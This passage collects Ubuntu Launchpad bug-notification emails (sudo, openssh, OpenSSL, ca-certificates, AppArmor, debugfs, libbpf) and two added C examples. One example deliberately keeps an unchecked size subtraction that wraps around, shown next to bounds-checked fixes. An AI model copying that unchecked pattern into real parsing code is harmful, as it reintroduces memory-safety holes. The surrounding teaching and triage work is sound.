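The unsigned wrap-around described under Issue 1 above, next to the bound checks that stop it before the allocation. This is an added example, not code from apt, python-apt or the GHSL report; `struct member`, its 64-bit `size` field and the function names are assumptions made for illustration.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for the archive member record. The field mirrors
 * Memb->Size from the report; the 64-bit unsigned type is an assumption. */
struct member {
    uint64_t size;              /* payload bytes declared by the member header */
};

/* The reported pattern: "Memb->Size -= Len" with no bound check.
 * Unsigned arithmetic wraps, so len > size leaves a value close to 2^64. */
static uint64_t consume_unchecked(struct member *m, uint64_t len)
{
    m->size -= len;
    return m->size;
}

/* Hardened form: a prefix longer than the member itself is malformed input.
 * Returns 0 on success, -1 on rejection (the member is left untouched). */
static int consume_checked(struct member *m, uint64_t len)
{
    if (len > m->size)
        return -1;
    m->size -= len;
    return 0;
}

/* Second line of defence at the allocation site (the report's
 * "new char[member->Size]"): a member cannot be larger than the bytes
 * left in the file, and the caller supplies a policy cap on top of that. */
static char *alloc_member(const struct member *m, uint64_t bytes_left, uint64_t cap)
{
    if (m->size > bytes_left || m->size > cap || m->size > SIZE_MAX - 1)
        return NULL;
    return calloc(1, (size_t)m->size + 1);
}

int main(void)
{
    /* Constructed values: a 4-byte member whose prefix claims 10 bytes. */
    struct member bad = { 4 }, good = { 4 };

    printf("unchecked size: 0x%" PRIx64 "\n", consume_unchecked(&bad, 10));
    printf("checked result: %d, size still %" PRIu64 "\n",
           consume_checked(&good, 10), good.size);

    char *buf = alloc_member(&bad, 1024, 1u << 20);
    printf("allocation for wrapped size: %s\n", buf ? "granted" : "refused");
    free(buf);
    return 0;
}
```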
  

[Touch-packages] [Bug 1915945] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed sudo package post-installation script subprocess returned error exit status 1

2021-02-23 Thread Seth Arnold
What's the output of:

lsattr -l /etc/sudoers

Please note that the sudoers file should only ever be edited with
visudo, which will perform safety checks on the file when you try to
save it.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1915945

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed
  sudo package post-installation script subprocess returned error exit
  status 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  I've put the system to upgrade and this error occurred!!

  I tried many ways to correct it but all attempts were unsuccessful.

  Best regards,

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   software-properties-common:amd64: Install
   software-properties-gtk:amd64: Install
   python3-software-properties:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 13:43:57 2021
  DuplicateSignature:
   package:sudo:1.8.31-1ubuntu1.2
   Setting up sudo (1.8.31-1ubuntu1.2) ...
   chown: alterando o dono de '/etc/sudoers': Operação não permitida
   dpkg: error processing package sudo (--configure):
installed sudo package post-installation script subprocess returned error 
exit status 1
  ErrorMessage: installed sudo package post-installation script subprocess 
returned error exit status 1
  InstallationDate: Installed on 2018-12-12 (797 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed 
sudo package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (139 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1915945/+subscriptions



[Touch-packages] [Bug 1916256] Re: NVIDIA Driver not working

2021-02-19 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1916256

Title:
  NVIDIA Driver not working

Status in xorg package in Ubuntu:
  New

Bug description:
  Hello, so I have an issue with the NVIDIA driver on a 4k res: the system is
  laggy, 1 frame per sec, and it shows me a glitch when I move the taps

  like : https://imgur.com/3LWJbbC

  thanks in advance

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: xorg 1:7.7+19ubuntu14
  ProcVersionSignature: Ubuntu 5.8.0-43.49~20.04.1-generic 5.8.18
  Uname: Linux 5.8.0-43-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  .proc.driver.nvidia.capabilities.gpu0: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/capabilities/gpu0'
  .proc.driver.nvidia.capabilities.mig: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/capabilities/mig'
  .proc.driver.nvidia.gpus..01.00.0: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/gpus/:01:00.0'
  .proc.driver.nvidia.registry: Binary: ""
  .proc.driver.nvidia.suspend: suspend hibernate resume
  .proc.driver.nvidia.suspend_depth: default modeset uvm
  .proc.driver.nvidia.version:
   NVRM version: NVIDIA UNIX x86_64 Kernel Module  460.32.03  Sun Dec 27 
19:00:34 UTC 2020
   GCC version:
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
  CasperMD5CheckResult: skip
  CompositorRunning: None
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Feb 19 09:30:48 2021
  DistUpgraded: Fresh install
  DistroCodename: focal
  DistroVariant: ubuntu
  ExtraDebuggingInterest: Yes, if not too technical
  GraphicsCard:
   Intel Corporation Skylake GT2 [HD Graphics 520] [8086:1916] (rev 07) 
(prog-if 00 [VGA controller])
 Subsystem: Hewlett-Packard Company Skylake GT2 [HD Graphics 520] 
[103c:80e5]
 Subsystem: Hewlett-Packard Company GM107M [GeForce GTX 950M] [103c:80e5]
  InstallationDate: Installed on 2021-02-19 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  MachineType: HP HP ENVY Notebook
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-43-generic 
root=UUID=d6d44f80-a9fe-4951-b886-8035f1017eff ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  UpgradeStatus: No upgrade log present (probably fresh install)
  acpidump: Error: command ['pkexec', '/usr/share/apport/dump_acpi_tables.py'] 
failed with exit code 126: Error executing command as another user: Request 
dismissed
  dmi.bios.date: 03/04/2016
  dmi.bios.release: 15.53
  dmi.bios.vendor: Insyde
  dmi.bios.version: F.35
  dmi.board.asset.tag: Type2 - Board Asset Tag
  dmi.board.name: 80E5
  dmi.board.vendor: HP
  dmi.board.version: 87.60
  dmi.chassis.asset.tag: Chassis Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: HP
  dmi.chassis.version: Chassis Version
  dmi.ec.firmware.release: 87.60
  dmi.modalias: 
dmi:bvnInsyde:bvrF.35:bd03/04/2016:br15.53:efr87.60:svnHP:pnHPENVYNotebook:pvrType1ProductConfigId:rvnHP:rn80E5:rvr87.60:cvnHP:ct10:cvrChassisVersion:
  dmi.product.family: 103C_5335KV G=N L=CON B=HP S=ENV
  dmi.product.name: HP ENVY Notebook
  dmi.product.sku: V8S44EA#A2N
  dmi.product.version: Type1ProductConfigId
  dmi.sys.vendor: HP
  version.compiz: compiz N/A
  version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx N/A
  version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A
  version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.1
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20200226-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1916256/+subscriptions



[Touch-packages] [Bug 1915945] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed sudo package post-installation script subprocess returned error exit status 1

2021-02-17 Thread Seth Arnold
Hello,

chown: alterando o dono de '/etc/sudoers': Operação não permitida

Is there any chance you've set attrs on this file to prevent it from
being modified?

Thanks

** Changed in: sudo (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1915945

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed
  sudo package post-installation script subprocess returned error exit
  status 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  I've put the system to upgrade and this error occurred!!

  I tried many ways to correct it but all attempts were unsuccessful.

  Best regards,

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   software-properties-common:amd64: Install
   software-properties-gtk:amd64: Install
   python3-software-properties:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 13:43:57 2021
  DuplicateSignature:
   package:sudo:1.8.31-1ubuntu1.2
   Setting up sudo (1.8.31-1ubuntu1.2) ...
   chown: alterando o dono de '/etc/sudoers': Operação não permitida
   dpkg: error processing package sudo (--configure):
installed sudo package post-installation script subprocess returned error 
exit status 1
  ErrorMessage: installed sudo package post-installation script subprocess 
returned error exit status 1
  InstallationDate: Installed on 2018-12-12 (797 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed 
sudo package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (139 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1915945/+subscriptions



[Touch-packages] [Bug 1878194] Re: [Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting HSP/HFP audio profile in Focal Fossa

2021-02-17 Thread Seth Arnold
*** This bug is a duplicate of bug 1871794 ***
https://bugs.launchpad.net/bugs/1871794

** Information type changed from Public Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1878194

Title:
  [Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting
  HSP/HFP audio profile in Focal Fossa

Status in bluez package in Ubuntu:
  Confirmed
Status in pulseaudio package in Ubuntu:
  Confirmed

Bug description:
  After updating the release from Ubuntu 19.10 to 20.04, the bluetooth
  headset doesn't work anymore when HSP/HFP profile is selected.

  With Ubuntu 19.10 the headset was working, there was audio and the mic
  was perfect for video conferencing.

  [Steps to reproduce]
  1. Connect headset (used blueman to setup and connect)
  1.1. When connected the system automatically selects A2DP profile
  2. Start playing audio (browser or other)
  3. Change profile to HSP/HFP with pavucontrol (or blueman)
  4. The audio disappears and microphone is not working (no input)
  5. Optionally switch back to A2DP and the audio comes back

  [Expected]
  When switching to HSP/HFP the audio should keep playing and the microphone 
should start working

  [Notes]
  I tried with pavucontrol to switch between profiles while playing audio from 
a browser.
  As side note there's a led in the headset that still blinks when switching 
profile.

  I tried deleting the pulse folder under user's profile .config without
  success, also reinstalled packages and did a `sudo alsa force-reload`
  and rebooting several times.

  Note: not sure this is a duplicate of [Bug #1576559], it looks quite
  different since the profile changes but the headset stops working.

  [System info]
  Ubuntu: 20.04 - Linux 5.4.0-29-generic x86_64
  pulseaudio: 1:13.99.1-1ubuntu3
  bluez: 5.53-0ubuntu3

  Headset: Sennheiser HD 4.50 BTNC

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1878194/+subscriptions



[Touch-packages] [Bug 1915913] Re: OpenSSL Multiple Denial of Service Vulnerabilities

2021-02-17 Thread Seth Arnold
Hello, there are untested packages in
https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+packages
in case you wish to test them in your environment.

Thanks

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1915913

Title:
  OpenSSL Multiple Denial of Service Vulnerabilities

Status in openssl package in Ubuntu:
  New

Bug description:
  Multiple vulnerabilities have been reported in OpenSSL, which can be
  exploited by malicious people to cause a DoS (Denial of Service).

  1

  An error related to the "X509_issuer_and_serial_hash()" function
  (crypto/x509/x509_cmp.c) can be exploited to trigger a NULL pointer
  dereference and subsequently cause a crash.

  2

  An integer overflow error related to CipherUpdate calls can be
  exploited to cause a crash.

  The vulnerabilities are reported in versions prior to 1.1.1j and prior
  to 1.0.2y.

  Affected Software

  The following software is affected by the described vulnerability.
  Please check the vendor links below to see if exactly your version is
  affected.

  OpenSSL 1.x

  Solution

  Update to version 1.1.1j or 1.0.2y.

  References

  1. https://www.openssl.org/news/secadv/20210216.txt

  2. https://github.com/openssl/openssl/commit/8130d654d1de922ea224fa18ee3bc7262edc39c0

  3. https://github.com/openssl/openssl/commit/c9fb704cf3af5524eb8e79961e31b60eee8c3c47

  Please provide an update.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1915913/+subscriptions



[Touch-packages] [Bug 1915908] Re: package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade: installed openssh-server package post-installation script subprocess returned error exit status

2021-02-17 Thread Seth Arnold
Hello, note this line from the automatically added contents:

 SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit
code 255: /etc/ssh/sshd_config line 1: garbage at end of line; "to".

It looks like your /etc/ssh/sshd_config file may be incorrect.

Thanks

** Changed in: openssh (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1915908

Title:
  package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade:
  installed openssh-server package post-installation script subprocess
  returned error exit status 1

Status in openssh package in Ubuntu:
  Incomplete

Bug description:
  sh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: 
enabled)
   Active: activating (auto-restart) (Result: exit-code) since Wed 
2021-02-17 15:42:28 IST; 11ms ago
 Docs: man:sshd(8)
   man:sshd_config(5)
  Process: 24813 ExecStartPre=/usr/sbin/sshd -t (code=exited, 
status=255/EXCEPTION)
  dpkg: error processing package openssh-server (--configure):
   installed openssh-server package post-installation script subprocess 
returned error exit status 1
  Processing triggers for systemd (245.4-4ubuntu3.4) ...
  Processing triggers for man-db (2.9.1-1) ...
  Processing triggers for ufw (0.36-6) ...
  Errors were encountered while processing:
   openssh-server
  E: Sub-process /usr/bin/dpkg returned an error code (1)

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: openssh-server 1:8.2p1-4ubuntu0.1
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   openssh-server:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 15:42:28 2021
  ErrorMessage: installed openssh-server package post-installation script 
subprocess returned error exit status 1
  InstallationDate: Installed on 2021-01-05 (42 days ago)
  InstallationMedia: Ubuntu 18.04.4 LTS "Bionic Beaver" - Release amd64 
(20200203.1)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python3.8, Python 3.8.5, python-is-python3, 3.8.2-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: /etc/ssh/sshd_config line 1: garbage at end of line; "to".
  SourcePackage: openssh
  Title: package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade: 
installed openssh-server package post-installation script subprocess returned 
error exit status 1
  UpgradeStatus: Upgraded to focal on 2021-02-04 (12 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1915908/+subscriptions



[Touch-packages] [Bug 1914839] Re: package upgrade should replace /etc/ssl/certs/ca-certificates.crt atomically

2021-02-05 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1914839

Title:
  package upgrade should replace /etc/ssl/certs/ca-certificates.crt
  atomically

Status in ca-certificates package in Ubuntu:
  New

Bug description:
  While upgrading the ca-certificates package, a process got the error:

  SSL_ca_file /etc/ssl/certs/ca-certificates.crt does not exist

  This file should be replaced atomically, with no time gap where the
  file does not exist.

  (I am flagging this as a security vulnerability because, while I did
  not experience any security issue, I can imagine at least the
  possibility of this being exploitable in some way in some
  circumstances.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1914839/+subscriptions

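The replacement with no window in which the file is missing, as requested in bug 1914839 above, is usually done by writing the new bundle to a temporary file in the same directory and renaming it over the old one. The C code below is an added example, not code from the ca-certificates package; `atomic_replace`, the helper names and the demo file name are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* write(2) may be short or interrupted; loop until everything is written. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Best effort: flush the directory entry so the rename survives a crash. */
static void sync_parent_dir(const char *path)
{
    char copy[4096];
    snprintf(copy, sizeof copy, "%s", path);    /* dirname() may modify its argument */
    int dfd = open(dirname(copy), O_RDONLY);
    if (dfd >= 0) {
        fsync(dfd);
        close(dfd);
    }
}

/* Replace `path` so that a concurrent reader sees either the complete old
 * file or the complete new one, never a missing or half-written file.
 * Returns 0 on success, -1 with errno set on failure (old file untouched). */
int atomic_replace(const char *path, const char *data, size_t len, mode_t mode)
{
    char tmp[4096];
    /* Same directory as the target: rename(2) is atomic only within one filesystem. */
    int n = snprintf(tmp, sizeof tmp, "%s.XXXXXX", path);
    if (n < 0 || (size_t)n >= sizeof tmp) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int fd = mkstemp(tmp);                      /* created 0600, unpredictable name */
    if (fd < 0)
        return -1;

    /* Data and final permissions must be on disk before the name is switched. */
    int ok = write_all(fd, data, len) == 0 && fchmod(fd, mode) == 0 && fsync(fd) == 0;
    int saved = errno;
    if (close(fd) != 0 && ok) {
        ok = 0;
        saved = errno;
    }
    if (ok && rename(tmp, path) != 0) {
        ok = 0;
        saved = errno;
    }
    if (!ok) {
        unlink(tmp);                            /* never leave a partial temp file behind */
        errno = saved;
        return -1;
    }
    sync_parent_dir(path);
    return 0;
}

/* Demo helper: read a small file back as a NUL-terminated string. */
static long read_small_file(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}

int main(void)
{
    const char *bundle = "demo-ca-bundle.crt";  /* constructed demo path, not the system file */
    const char *v1 = "OLD BUNDLE\n", *v2 = "NEW BUNDLE\n";
    char buf[64];

    if (atomic_replace(bundle, v1, strlen(v1), 0644) != 0 ||
        atomic_replace(bundle, v2, strlen(v2), 0644) != 0) {
        perror("atomic_replace");
        return 1;
    }
    if (read_small_file(bundle, buf, sizeof buf) > 0)
        printf("bundle now contains: %s", buf);
    unlink(bundle);
    return 0;
}
```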


[Touch-packages] [Bug 1914279] Re: linux from security may force reboots without complete dkms modules

2021-02-02 Thread Seth Arnold
Re test rebuilds, that's certainly the intention, but there are
occasional problems:

https://launchpad.net/bugs/1910555
https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-340/+bug/1910709
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1910503 (virtualbox, 
probably not in scope)

These three were discussed a bit on
https://discourse.ubuntu.com/t/improvements-for-hardware-support-in-ubuntu-desktop-installation-media/20606

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1914279

Title:
  linux from security may force reboots without complete dkms modules

Status in apt package in Ubuntu:
  New
Status in dkms package in Ubuntu:
  New
Status in linux package in Ubuntu:
  Confirmed
Status in linux-meta package in Ubuntu:
  New
Status in unattended-upgrades package in Ubuntu:
  New
Status in update-manager package in Ubuntu:
  New

Bug description:
  Whilst discussing

  https://discourse.ubuntu.com/t/improvements-for-hardware-support-in-ubuntu-desktop-installation-media/20606

  We have noticed a reference to somebody not having working backport-
  iwlwifi-dkms, whilst SRU of that happened before the v5.4 -> v5.8
  switch.

  However, kernel meta switch was pushed to security pocket, but the
  dkms modules are all in -updates only.

  This may result in people automatically installing the new kernel with
  unattended upgrades; dkms modules failing to build; and a reboot
  required flag left on disk.

  At this point launching update manager will not offer to install dkms
  modules from updates, and will guide the users to reboot, which
  will then cause them to boot the new kernel without the dkms modules
  that might be providing networking for them.

  Should dkms modules SRUs always get published into -security
  pocket, as well as the -updates pocket?

  Should linux maintainer scripts prevent touching reboot required flag
  if any dkms modules fail to build?

  Should apt / unattended-upgrades / update-manager always update dkms
  modules with kernels?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1914279/+subscriptions



[Touch-packages] [Bug 1914148] Re: Firefox constantly disabled on Apparmor

2021-02-01 Thread Seth Arnold
The Firefox AppArmor profile isn't enabled by default because it forces
the user to change how they interact with their browser.

Consider that the profile really allows downloads only into ~/Downloads/
directories. (There are other places that are writable, but even less
suitable for downloads.) Many users prefer to download directly to their
existing directory structure.

Consider the wide variety of plugins that may supply helper executables.
Plugins failing without a good interface in the browser to know why they
have failed would be very confusing.

Consider the huge number of applications that people install to handle
mime types. People want to be able to click a link to any random file
and have the browser offer to launch the helper.

People who are fine with all these impositions in how they can use
Firefox can enable the Firefox profile. They'll know how to debug issues
when they arise, and furthermore, probably already have a workflow that
makes it easy to work with the AppArmor policy restrictions.

But most Ubuntu users are completely unaware that they're running
AppArmor on many of their services. Surely some of this group would like
to use it more, if only they knew about it, but also many people just
need their computers to keep working as they always have.

If we enable this one profile, we run the serious risk that users will
disable AppArmor entirely.

Thanks

** Package changed: apparmor (Ubuntu) => firefox (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1914148

Title:
  Firefox constantly disabled on Apparmor

Status in firefox package in Ubuntu:
  New

Bug description:
  Once again Apparmor policies are constantly disabled for Firefox.
  - I've reported this bug in December, then came a patch, then for the
    last month of January - regardless of updates, Firefox profiles are
    skipped.
  - You cannot be serious?
  - This is a consistent security issue!
  - Please write rules that consistently work or teach us how to do so /
    deal with Mozilla

  "Feb 02 00:17:24 USER apparmor.systemd[1117]: Skipping profile in /etc/apparmor.d/disable: usr.bin.firefox
  Feb 02 00:17:24 USER apparmor.systemd[1118]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Feb 02 00:17:24 USER systemd[1]: Finished Load AppArmor profiles.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1914148/+subscriptions



[Touch-packages] [Bug 1872504] Re: date modified is wrong for files on an exfat formatted drive

2021-01-22 Thread Seth Arnold
I added the linux source package to this bug because I've heard this
commit addresses the issue:

https://github.com/gregkh/linux/commit/099340d3e758cca06a82bf5dcff8b9a8acbdcb0a

Thanks

** Also affects: linux (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-meta in Ubuntu.
https://bugs.launchpad.net/bugs/1872504

Title:
  date modified is wrong for files on an exfat formatted drive

Status in linux package in Ubuntu:
  New
Status in ubuntu-meta package in Ubuntu:
  Confirmed

Bug description:
  When using exfat formatted drives (e.g. my camera card) with focal
  fossa any access causes the date modified to be set, even when it
  would not normally be set, and it is set a month into the future.

  Installing exfat-fuse and exfat-utils results in the correct
  behaviour.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: ubuntu-release-upgrader-core 1:20.04.18
  ProcVersionSignature: Ubuntu 5.4.0-21.25-generic 5.4.27
  Uname: Linux 5.4.0-21-generic x86_64
  ApportVersion: 2.20.11-0ubuntu26
  Architecture: amd64
  CasperMD5CheckResult: skip
  CrashDB: ubuntu
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Apr 13 17:27:30 2020
  InstallationDate: Installed on 2020-04-12 (1 days ago)
  InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Beta amd64 (20200409)
  PackageArchitecture: all
  ProcEnviron:
   LANGUAGE=en_GB:en
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  SourcePackage: ubuntu-release-upgrader
  Symptom: dist-upgrade
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1872504/+subscriptions



[Touch-packages] [Bug 1912855] Re: debugfs shouldn't be mounted by default

2021-01-22 Thread Seth Arnold
I'm inclined to say an admin should ask to mount this explicitly,
however stgraber pointed out on irc that lxd premounts /sys/kernel/debug
in part to placate upstart in guests. This may have implications for
disabling /lib/systemd/system/sys-kernel-debug.mount by default.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1912855

Title:
  debugfs shouldn't be mounted by default

Status in systemd package in Ubuntu:
  New

Bug description:
  On modern Ubuntu systems, /sys/kernel/debug is mounted by default due
  to sys-kernel-debug.mount being enabled by default.

  AFAIK, this FS doesn't need to be mounted for normal operations and
  back in the day, there were concerns about the security implications
  of having it enabled/mounted by default
  (https://lists.ubuntu.com/archives/kernel-team/2011-January/013418.html).

  Would it be possible to not have it mounted by default?

  
  $ apt-cache policy systemd
  systemd:
    Installed: 245.4-4ubuntu3.4
    Candidate: 245.4-4ubuntu3.4
    Version table:
   *** 245.4-4ubuntu3.4 500
          500 http://us.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       245.4-4ubuntu3 500
          500 http://us.archive.ubuntu.com/ubuntu focal/main amd64 Packages
  $ lsb_release -rd
  Description:  Ubuntu 20.04.1 LTS
  Release:  20.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1912855/+subscriptions



[Touch-packages] [Bug 1910576] Re: [MIR] libbpf (dependency of iproute2)

2021-01-14 Thread Seth Arnold
Thanks Christian, I think you're right, this probably doesn't need a
security review and being centralized in one place will probably be
easier to maintain.

Thanks

** Changed in: libbpf (Ubuntu)
   Status: New => Fix Committed

** Changed in: libbpf (Ubuntu)
 Assignee: Seth Arnold (seth-arnold) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to iproute2 in Ubuntu.
https://bugs.launchpad.net/bugs/1910576

Title:
  [MIR] libbpf (dependency of iproute2)

Status in iproute2 package in Ubuntu:
  Invalid
Status in libbpf package in Ubuntu:
  Fix Committed

Bug description:
  [Availability]
  libbpf | 0.1.0-1 | groovy/universe  | source
  libbpf | 0.3-2   | hirsute/universe | source

  [Rationale]
  Libbpf is (or is about to become) a dependency for building iproute2
  which already is in main. Using BPF is becoming more wide-spread. The
  library allows to load and use eBPF programs from user-space
  (functionality provided by the kernel). It is already maintained in
  main for Debian (https://tracker.debian.org/pkg/libbpf)

  [Security]
  Since the code is taken out of the Linux kernel, this should be treated
